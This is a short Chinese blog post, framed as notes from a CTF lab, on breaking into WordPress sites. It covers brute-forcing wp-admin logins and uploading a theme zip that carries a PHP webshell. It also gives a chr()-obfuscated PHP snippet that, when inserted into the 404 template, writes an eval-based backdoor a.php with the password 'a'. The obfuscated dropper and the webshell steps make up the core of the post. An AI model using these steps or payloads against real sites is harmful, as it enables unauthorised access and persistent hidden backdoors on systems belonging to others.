Worldpress 相关利用

worldpress是一款主流的博客系统,但是关于它的漏洞也层出不穷。
这次是因为一次CTF靶场遇到此类情况,顺便做个简单记录。

worldpress系统本身比较安全,但是因为它可以自定义插件,很多时候因为插件作者安全开发的能力有高有低,导致许多安全漏洞的出现。

0x01 弱口令

后台默认地址为:xxxx/wp-admin/

没有验证码可以暴力破解,常见用户名admin,worldpress,system等。

进入后台后的利用:

1 上传主题包getshell

本机建立目录“upkn”,把一句话1.php放进去。打包upkn目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
wp-content/themes/upkn/1.php。

2 修改主题文件

“外观”-“编辑”-“404模板
<script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
插到文件头
点404模板的时候地址栏有相对路径,默认是wp-content/themes/twentyten/404.php
更新完直接访问localhost/wp-content/themes/twentyten/404.php就会在twentyten目录生成一句话后门a.php 密码a

0x02 插件漏洞利用

插件漏洞类型很多,例如xss,sql注入,rce等

推荐工具方便自查:https://github.com/wpscanteam/wpscan

发布了44 篇原创文章 · 获赞 12 · 访问量 5543

猜你喜欢

转载自blog.csdn.net/qq_39326816/article/details/103037383